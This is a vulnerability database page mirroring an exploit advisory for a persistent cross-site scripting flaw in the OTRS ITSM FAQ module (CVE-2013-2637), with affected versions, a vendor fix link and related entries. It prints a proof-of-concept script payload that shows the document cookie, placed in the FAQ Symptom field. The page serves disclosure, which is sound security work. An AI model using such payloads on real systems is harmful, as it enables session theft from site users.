Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:78602
HistoryJul 01, 2014 - 12:00 a.m.

OTRS FAQ Module - Persistent XSS

2014-07-0100:00:00
Root
www.seebug.org
15

0.017 Low

EPSS

Percentile

86.3%

JSON

No description provided by source.


                                                # Exploit Title: [OTRS Faq Module - Persistent  XSS]

# Date: [2-Apr-2013]
# Exploit Author: [Luigi Vezzoso]
# Vendor Homepage: [http://www.otrs.com]
# Version: [OTRS ITSM 3.2.x,OTRS ITSM 3.1.x,OTRS ITSM 3.0.x]
# Tested on: [Perl]
# CVE : [CVE-2013-2637]

#OVERVIEW
The OTRS ITSM FAQ Module 3.2.x and below is vulnerable to a persistant XSS that permit some client side attack like cookies grabbing.

#INTRODUCTION
OTRS (http://www.otrs.com) is a flexible Help Desk and IT-Service Management Software distribuited as opensource project (AGPL License) and also as-a-service. WIth a 1,650,000 downloads and 110,000 installation is one of the most used ticketing and service management software in the world.

#VULNERABILITY DESCRIPTION
The FAQ Module permit to share FAQ documents to Admins (called Agents in OTRS), Customers and everyone. The documents are presented like a wiki. Each user with the permission of add a FAQ can create a custom FAQ with the exploit. Each user that can view that FAQ (also the admin) can trigger the XSS. 

The user can add JavaScript in the "Syntoms" of FAQ like the simplest:	<script>alert("H4cked!!  "+document.cookie);</script>


--------------------------------------------------------------------------------
 <li class="Customer Visible">
                <div class="MessageHeader">
                    <h3>Symptom:</h3>
                    <div class="Clear"></div>
                </div>
                <div class="ArticleFAQContent">
                    <div class="message">
                        <script>alert("H4cked!!  "+document.cookie);</script>
                    </div>
                </div>
            </li>
--------------------------------------------------------------------------------

#VERSIONS AFFECTED
OTRS ITSM 3.2.x, OTRS ITSM 3.1.x, OTRS ITSM 3.0.x, FAQ 2.1.x, FAQ 2.0.x

#SOLUTION
Referer to vendor security advisor @ http://www.otrs.com/en/open-source/community-news/security-advisories/security-advisory-2013-02/

#CREDITS
Luigi Vezzoso 
email:	[email protected]
skype:	luigivezzoso

Related

openvas 1
nessus 2
exploitpack 1
packetstorm 1
prion 1
zdt 1
freebsd 1
cve 1
exploitdb 1
openvas
openvas
OTRS ITSM XSS Vulnerability (OSA-2013-02)
2013-09-27 00:00:00
nessus
nessus
FreeBSD : otrs -- XSS vulnerability (661bd031-c37d-11e2-addb-60a44c524f57)
2013-05-24 00:00:00
openSUSE Security Update : otrs (openSUSE-SU-2013:1338-1)
2014-06-13 00:00:00
exploitpack
exploitpack
OTRS 3.x - FAQ Module Persistent Cross-Site Scripting
2013-04-08 00:00:00
packetstorm
packetstorm
OTRS FAQ Cross Site Scripting
2013-04-07 00:00:00
prion
prion
Cross site scripting
2020-02-12 17:15:00
zdt
zdt
OTRS FAQ Module - Persistent XSS
2013-04-08 00:00:00
freebsd
freebsd
otrs -- XSS vulnerability
2013-04-02 00:00:00
cve
cve
CVE-2013-2637
2020-02-12 17:15:00
exploitdb
exploitdb
OTRS 3.x - FAQ Module Persistent Cross-Site Scripting
2013-04-08 00:00:00

0.017 Low

EPSS

Percentile

86.3%

JSON
Related for SSV:78602
openvas1nessus2exploitpack1packetstorm1prion1zdt1freebsd1cve1exploitdb1